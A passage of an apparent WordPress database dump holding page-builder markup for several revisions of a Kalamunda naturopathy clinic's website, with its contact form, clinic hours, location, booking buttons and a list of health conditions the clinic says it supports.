type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" min_height=\"209.5px\" custom_padding=\"||38px|||\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"550px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" hover_enabled=\"0\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking) & Mead Medical, Kalamunda (Tuesday mornings only) </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\" background_color=\"#e6e5e1\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-09-16 18:04:54','2025-09-16 10:04:54','',26,'https://verdenaturopathy.com.au/?p=481',0,'revision','',0),(486,1,'2025-10-02 10:47:36','2025-10-02 02:47:36','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">the healing power of nature</span></li>\n<li><span style=\"font-size: medium; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: medium; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">treat the person as a whole</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\">We can support health in many conditions, including:</span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></li>\n<li><span style=\"font-family: Montserrat;\">nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></li>\n<li><span style=\"font-family: Montserrat;\">metabolic dysfunction (insulin resistance)</span></li>\n<li><span style=\"font-family: Montserrat;\">immune dysfunction (autoimmunity, recurrent infections)</span></li>\n<li><span style=\"font-family: Montserrat;\">thyroid conditions (hyper/hypothyroidism)</span></li>\n<li><span style=\"font-family: Montserrat;\">women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></li>\n<li><span style=\"font-family: Montserrat;\">skin health (acne, eczema/dermatitis, rosacea)</span></li>\n<li><span style=\"font-family: Montserrat;\">cardiovascular health (chronic inflammation, high cholesterol)</span></li>\n<li><span style=\"font-family: Montserrat;\">men\'s health (prostate issues, sexual health)</span></li>\n<li><span style=\"font-family: Montserrat;\">children\'s health (poor immunity, digestive issues, behavioural issues)</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\">Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></p>\n<p><span style=\"font-family: Montserrat;\">We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2025-10-02 10:47:36','2025-10-02 02:47:36','',28,'https://verdenaturopathy.com.au/?p=486',0,'revision','',0),(491,1,'2025-10-02 10:52:46','2025-10-02 02:52:46','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#e6e5e1\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/</span><span style=\"font-family: Montserrat;\">Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2025-10-02 10:52:46','2025-10-02 02:52:46','',188,'https://verdenaturopathy.com.au/?p=491',0,'revision','',0),(492,1,'2025-10-02 10:52:50','2025-10-02 02:52:50','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#e6e5e1\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" 